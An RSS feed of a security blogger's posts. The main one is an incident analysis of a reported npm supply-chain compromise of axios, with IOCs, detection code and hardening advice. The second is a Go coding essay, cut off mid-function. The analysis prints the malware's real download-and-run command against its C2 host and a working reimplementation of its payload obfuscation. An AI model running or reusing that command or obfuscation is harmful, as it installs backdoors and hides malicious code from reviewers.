<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: RoseSecurity</title>
    <description>The latest articles on DEV Community by RoseSecurity (@rosesecurity).</description>
    <link>https://dev.to/rosesecurity</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1076321%2F10e436ef-7f26-4e21-a611-3020fd13caed.png</url>
      <title>DEV Community: RoseSecurity</title>
      <link>https://dev.to/rosesecurity</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rosesecurity"/>
    <language>en</language>
    <item>
      <title>Welcome to Transitive Dependency Hell</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 31 Mar 2026 21:59:46 +0000</pubDate>
      <link>https://dev.to/rosesecurity/welcome-to-transitive-dependency-hell-1cjn</link>
      <guid>https://dev.to/rosesecurity/welcome-to-transitive-dependency-hell-1cjn</guid>
      <description>&lt;p&gt;At 00:21 UTC on March 31, someone published &lt;code&gt;axios@1.14.1&lt;/code&gt; to npm. Three hours later it was pulled. In between, every &lt;code&gt;npm install&lt;/code&gt; and &lt;code&gt;npx&lt;/code&gt; invocation that resolved &lt;code&gt;axios@latest&lt;/code&gt; executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here's what that three-hour window looked like from one developer's MacBook.&lt;/p&gt;

&lt;h2&gt;
  
  
  Monday Night
&lt;/h2&gt;

&lt;p&gt;A developer sits down, opens a terminal, and runs a command they've run dozens of times before:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx &lt;span class="nt"&gt;--yes&lt;/span&gt; @datadog/datadog-ci &lt;span class="nt"&gt;--help&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A legitimate tool from a legitimate vendor. The &lt;code&gt;--yes&lt;/code&gt; flag skips npm's confirmation prompt. The developer (or Claude) isn't even using the tool yet, just checking its options.&lt;/p&gt;

&lt;p&gt;npm resolves the dependency tree and starts writing packages to disk: &lt;code&gt;dogapi&lt;/code&gt;, &lt;code&gt;escodegen&lt;/code&gt;, &lt;code&gt;esprima&lt;/code&gt;, &lt;code&gt;js-yaml&lt;/code&gt;, &lt;code&gt;fast-xml-parser&lt;/code&gt;, &lt;code&gt;rc&lt;/code&gt;, &lt;code&gt;is-docker&lt;/code&gt;, &lt;code&gt;semver&lt;/code&gt;, &lt;code&gt;uuid&lt;/code&gt;, and &lt;code&gt;axios&lt;/code&gt;. All names you'd recognize, and all packages that individually look fine. But &lt;code&gt;axios&lt;/code&gt; just resolved to &lt;code&gt;1.14.1&lt;/code&gt;, which is not the version that Axios's maintainers published four days earlier. It's the version an attacker published twenty minutes ago.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hijack
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;axios@1.14.0&lt;/code&gt; was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of &lt;code&gt;jasonsaayman&lt;/code&gt;, an existing Axios maintainer, and changed the account email from &lt;code&gt;jasonsaayman@gmail.com&lt;/code&gt; to &lt;code&gt;ifstap@proton.me&lt;/code&gt;. With publish access, they pushed two malicious versions in quick succession:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;00:21:58 UTC&lt;/strong&gt;: &lt;code&gt;axios@1.14.1&lt;/code&gt;, tagged &lt;code&gt;latest&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;01:00:57 UTC&lt;/strong&gt;: &lt;code&gt;axios@0.30.4&lt;/code&gt;, tagged &lt;code&gt;legacy&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;latest&lt;/code&gt; tag meant every unversioned &lt;code&gt;axios&lt;/code&gt; install worldwide pulled the backdoor. The &lt;code&gt;legacy&lt;/code&gt; tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: &lt;code&gt;plain-crypto-js&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Postinstall Chain
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; declared &lt;code&gt;postinstall: node setup.js&lt;/code&gt; in its &lt;code&gt;package.json&lt;/code&gt;, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with &lt;code&gt;OrDeR_7077&lt;/code&gt;) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.&lt;/p&gt;
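
&lt;p&gt;To make the layering concrete, here is a minimal Python sketch of the same scheme: repeating-key XOR under the reported key, then base64, then string reversal. The payload string is a stand-in for illustration, not the actual &lt;code&gt;setup.js&lt;/code&gt; contents.&lt;/p&gt;

```python
import base64

KEY = b"OrDeR_7077"  # XOR key recovered from the sample

def xor(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR; applying it twice with the same key is a no-op
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def obfuscate(plaintext: bytes) -> str:
    # Layer 1: XOR with the key, layer 2: base64, layer 3: reverse the string
    return base64.b64encode(xor(plaintext, KEY)).decode()[::-1]

def deobfuscate(blob: str) -> bytes:
    # Peel the layers in the opposite order
    return xor(base64.b64decode(blob[::-1]), KEY)

payload = b"console.log('payload goes here')"  # stand-in, not the real code
blob = obfuscate(payload)
assert deobfuscate(blob) == payload
```

Because XOR is its own inverse, decoding just peels the layers in reverse, which is why grepping the shipped file for suspicious strings turns up nothing.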

&lt;p&gt;On the developer's Mac, CrowdStrike's process tree captured the full chain. &lt;code&gt;npx&lt;/code&gt; spawned &lt;code&gt;node setup.js&lt;/code&gt;, which shelled out to &lt;code&gt;/bin/sh&lt;/code&gt; to launch &lt;code&gt;osascript&lt;/code&gt; against a script dropped into the per-user temp directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;nohup &lt;/span&gt;osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;osascript&lt;/code&gt; is Apple's AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The &lt;code&gt;nohup&lt;/code&gt; ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'curl -o /Library/Caches/com.apple.act.mond \
            -d packages.npm.org/product0 \
            -s http://sfrclak.com:8000/6202033 \
       &amp;amp;&amp;amp; chmod 770 /Library/Caches/com.apple.act.mond \
       &amp;amp;&amp;amp; /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;amp;"'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &amp;amp;&amp;gt; /dev/null
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Download, set executable, and launch the beacon, all in a single &lt;code&gt;sh -c&lt;/code&gt; invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.&lt;/p&gt;

&lt;p&gt;The output path masquerades as an Apple system daemon using the &lt;code&gt;com.apple.*&lt;/code&gt; reverse-DNS convention. The &lt;code&gt;-d packages.npm.org/product0&lt;/code&gt; is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The &lt;code&gt;-s&lt;/code&gt; flag keeps curl silent, and the outer &lt;code&gt;&amp;amp;&amp;gt; /dev/null&lt;/code&gt; swallows any output from the entire chain.&lt;/p&gt;

&lt;p&gt;The binary immediately began beaconing to &lt;code&gt;142.11.206.73:8000&lt;/code&gt; (&lt;code&gt;sfrclak.com&lt;/code&gt;) over HTTP. Ten hours later, CrowdStrike's telemetry shows &lt;code&gt;com.apple.act.mond&lt;/code&gt; still running and reading &lt;code&gt;/Library/Preferences/com.apple.networkd.plist&lt;/code&gt; for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you're deciding whether a machine is worth keeping access to.&lt;/p&gt;

&lt;p&gt;Meanwhile, back in &lt;code&gt;node_modules&lt;/code&gt;, &lt;code&gt;setup.js&lt;/code&gt; was cleaning up after itself. It deleted its own file with &lt;code&gt;fs.unlink(__filename)&lt;/code&gt; and renamed a clean &lt;code&gt;package.md&lt;/code&gt; to &lt;code&gt;package.json&lt;/code&gt;, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.&lt;/p&gt;

&lt;h2&gt;
  
  
  Not Just Macs
&lt;/h2&gt;

&lt;p&gt;The same &lt;code&gt;setup.js&lt;/code&gt; had branches for every major platform:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Payload Path&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;macOS&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/Library/Caches/com.apple.act.mond&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AppleScript, curl, binary masquerading as Apple daemon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows&lt;/td&gt;
&lt;td&gt;&lt;code&gt;%PROGRAMDATA%\wt.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops &lt;code&gt;.ps1&lt;/code&gt; payload with &lt;code&gt;-w hidden -ep bypass&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/tmp/ld.py&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Python script downloaded and backgrounded with &lt;code&gt;nohup python3&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;All three phoned home to the same C2: &lt;code&gt;sfrclak.com:8000/6202033&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What CrowdStrike Caught (and Didn't)
&lt;/h2&gt;

&lt;p&gt;Falcon flagged the macOS beacon as &lt;code&gt;MacOSApplicationLayerProtocol&lt;/code&gt;, mapping to &lt;a href="https://attack.mitre.org/techniques/T1071/" rel="noopener noreferrer"&gt;T1071&lt;/a&gt; (Application Layer Protocol) under &lt;a href="https://attack.mitre.org/tactics/TA0011/" rel="noopener noreferrer"&gt;TA0011&lt;/a&gt; (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.&lt;/p&gt;

&lt;p&gt;Everything before that ran unimpeded. The &lt;code&gt;node setup.js&lt;/code&gt; postinstall hook, the &lt;code&gt;osascript&lt;/code&gt; execution from a temp directory, the &lt;code&gt;curl&lt;/code&gt; download and &lt;code&gt;chmod&lt;/code&gt; all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.&lt;/p&gt;

&lt;h2&gt;
  
  
  IOCs
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;C2 Domain&lt;/td&gt;
&lt;td&gt;Domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sfrclak.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 IP&lt;/td&gt;
&lt;td&gt;IPv4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;142.11.206.73&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 Port&lt;/td&gt;
&lt;td&gt;Port&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8000&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Campaign ID&lt;/td&gt;
&lt;td&gt;String&lt;/td&gt;
&lt;td&gt;&lt;code&gt;6202033&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS Payload&lt;/td&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/Library/Caches/com.apple.act.mond&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS Hash&lt;/td&gt;
&lt;td&gt;SHA256&lt;/td&gt;
&lt;td&gt;&lt;code&gt;92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Payload&lt;/td&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;&lt;code&gt;%PROGRAMDATA%\wt.exe&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux Payload&lt;/td&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/tmp/ld.py&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tracking ID&lt;/td&gt;
&lt;td&gt;String&lt;/td&gt;
&lt;td&gt;&lt;code&gt;packages.npm.org/product0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compromised Packages&lt;/td&gt;
&lt;td&gt;npm&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;axios@1.14.1&lt;/code&gt;, &lt;code&gt;axios@0.30.4&lt;/code&gt;, &lt;code&gt;plain-crypto-js@4.2.0-4.2.1&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hijacked Account&lt;/td&gt;
&lt;td&gt;npm&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;jasonsaayman&lt;/code&gt; (email changed to &lt;code&gt;ifstap@proton.me&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;XOR Key&lt;/td&gt;
&lt;td&gt;String&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OrDeR_7077&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Takeaways
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Check your lockfiles now.&lt;/strong&gt; Search &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;yarn.lock&lt;/code&gt;, and &lt;code&gt;pnpm-lock.yaml&lt;/code&gt; for &lt;code&gt;axios@1.14.1&lt;/code&gt;, &lt;code&gt;axios@0.30.4&lt;/code&gt;, or any reference to &lt;code&gt;plain-crypto-js&lt;/code&gt;. If you find them, assume the installing machine is compromised.&lt;/p&gt;
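
&lt;p&gt;A quick way to sweep many repos is to parse the lockfile directly rather than eyeball it. The sketch below handles npm's &lt;code&gt;package-lock.json&lt;/code&gt; (lockfileVersion 2/3); yarn and pnpm lockfiles use different formats, so treat this as a starting point, not a complete scanner.&lt;/p&gt;

```python
import json
import pathlib

# Indicators from this incident; extend the sets as advisories are updated
BAD_VERSIONS = {("axios", "1.14.1"), ("axios", "0.30.4")}
BAD_NAMES = {"plain-crypto-js"}

def scan_lockfile(path: str) -> list[str]:
    """Return compromised package@version entries found in a package-lock.json."""
    lock = json.loads(pathlib.Path(path).read_text())
    hits = []
    # lockfileVersion 2/3 keys entries by path, e.g. "node_modules/axios"
    for pkg_path, meta in lock.get("packages", {}).items():
        name = pkg_path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version", "")
        if name in BAD_NAMES or (name, version) in BAD_VERSIONS:
            hits.append(f"{name}@{version}")
    return hits
```

Any hit means the machine that last ran `npm install` against that lockfile should be treated as compromised.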

&lt;p&gt;&lt;strong&gt;Disable postinstall scripts.&lt;/strong&gt; Add &lt;code&gt;ignore-scripts=true&lt;/code&gt; to &lt;code&gt;~/.npmrc&lt;/code&gt;. When a package legitimately needs a postinstall hook for native compilation, run &lt;code&gt;npm rebuild &amp;lt;package&amp;gt;&lt;/code&gt; explicitly after reviewing the script. This single setting would have stopped the entire attack chain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Monitor for &lt;code&gt;osascript&lt;/code&gt; spawned by &lt;code&gt;node&lt;/code&gt;.&lt;/strong&gt; There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.&lt;/p&gt;
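
&lt;p&gt;If your tooling exposes process snapshots, the ancestry check itself is simple. Below is an illustrative Python sketch over a &lt;code&gt;{pid: (ppid, name)}&lt;/code&gt; map, as you might build from &lt;code&gt;ps -axo pid,ppid,comm&lt;/code&gt; output; the function and field names here are assumptions for the example, not any vendor's API.&lt;/p&gt;

```python
def node_spawned_osascript(pid: int, procs: dict[int, tuple[int, str]]) -> bool:
    """True if `pid` is an osascript process with a node ancestor.

    `procs` maps pid to (ppid, executable name), e.g. parsed from
    `ps -axo pid,ppid,comm` output.
    """
    ppid, name = procs[pid]
    if name != "osascript":
        return False
    while ppid in procs:  # walk up the parent chain
        ppid, name = procs[ppid]
        if name == "node":
            return True
    return False

# A snapshot shaped like the process tree from this incident:
snapshot = {
    1:  (0, "launchd"),
    40: (1, "node"),       # npx -> node setup.js
    41: (40, "sh"),        # shelled out to /bin/sh
    42: (41, "osascript"), # AppleScript payload
}
```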

&lt;p&gt;The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm's default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every &lt;code&gt;npm install&lt;/code&gt; into an implicit trust decision across hundreds of packages maintained by people you've never met. The Axios maintainer account was compromised for three hours. That was enough.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This is the third post in a series on software supply chain attacks. The previous posts covered the &lt;a href="//{{%20site.baseurl%20}}/2026/03/20/typosquatting-trivy"&gt;Trivy ecosystem compromise&lt;/a&gt; and &lt;a href="//{{%20site.baseurl%20}}/2026/03/24/sha-pinning-is-not-enough"&gt;the limits of SHA pinning&lt;/a&gt;. Joe Desimone's &lt;a href="https://gist.github.com/joe-desimone/36061dabd2bc2513705e0d083a9673e7" rel="noopener noreferrer"&gt;technical analysis&lt;/a&gt; of the axios compromise is worth reading in full.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>npm</category>
      <category>security</category>
    </item>
    <item>
      <title>The Roadhouse Pattern</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Mon, 09 Feb 2026 21:18:27 +0000</pubDate>
      <link>https://dev.to/rosesecurity/the-roadhouse-pattern-2f4o</link>
      <guid>https://dev.to/rosesecurity/the-roadhouse-pattern-2f4o</guid>
      <description>&lt;p&gt;Imagine that Patrick Swayze is writing an SDK. He's haunted by memories of ripping out a man's throat for a &lt;code&gt;nil&lt;/code&gt; pointer deference. To recoop, he sits down in his home office and begins writing a function to issue a new HTTP request to the API, applying authentication and common headers. Before he even writes the &lt;code&gt;NewRequest&lt;/code&gt; logic, he introduces the Roadhouse pattern. The idea is that he wants to fail fast before any work begins, return specific sentinel errors so he knows where it all went wrong, and declare invariants where the guard clauses ARE the documentation for what to accept. Take a look at this function:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// newRequest creates an *http.Request, applying authentication and common&lt;/span&gt;
&lt;span class="c"&gt;// headers. The path should already include the API version prefix (e.g.&lt;/span&gt;
&lt;span class="c"&gt;// "/v1/devices").&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;newRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="n"&gt;io&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Reader&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;validateRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;validateClient&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewRequestWithContext&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;apiURL&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;body&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="o"&gt;...&lt;/span&gt;

&lt;span class="c"&gt;// validateClient checks that the Client is in a usable state.&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;validateClient&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;apiKey&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNoAPIKey&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;apiURL&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNoAPIURL&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;httpClient&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNoHTTPClient&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c"&gt;// validateRequest checks that the request parameters are valid.&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;validateRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNilContext&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
